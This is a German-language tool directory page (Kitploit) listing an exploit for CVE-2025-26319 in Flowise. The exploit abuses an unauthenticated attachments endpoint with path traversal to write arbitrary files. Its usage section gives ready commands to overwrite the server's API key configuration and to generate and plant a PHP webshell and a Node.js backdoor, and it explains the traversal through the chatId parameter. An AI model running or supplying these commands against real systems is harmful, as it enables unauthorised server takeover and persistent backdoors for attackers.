Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-26319 — Exploit für CVE-2025-26319, der auf den /api/v1/attachments-Endpoint von Flowise abzielt und nicht authentifiziertes, willkürliches Hochladen von Dateien sowie die Erstellung von Webshells durch Pfad-Traversal ermöglicht. | Kitploit
Tools/GitHubGitHub/redpack-kr/cve-2025-26319
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubredpack-kr/cve-2025-26319

CVE-2025-26319

Exploit für CVE-2025-26319, der auf den /api/v1/attachments-Endpoint von Flowise abzielt und nicht authentifiziertes, willkürliches Hochladen von Dateien sowie die Erstellung von Webshells durch Pfad-Traversal ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-26319

  1. Grundlegender Dateiupload python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
  2. Konfigurationsdatei hochladen

API-Schlüsselkonfiguration ändern

python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Automatisches Generieren und Hochladen von Webshell

PHP-Webshell hochladen

python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

Node.js-Backdoor hochladen

python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

Angriffsprinzip Die Route /api/v1/attachments befindet sich in der Whitelist und erfordert keine Authentifizierung Durch Manipulation des chatId-Parameters kann ein Path Traversal (../../../) durchgeführt werden Beliebige Dateien an beliebige Stellen im Server-Dateisystem hochladen

Tool herunterladen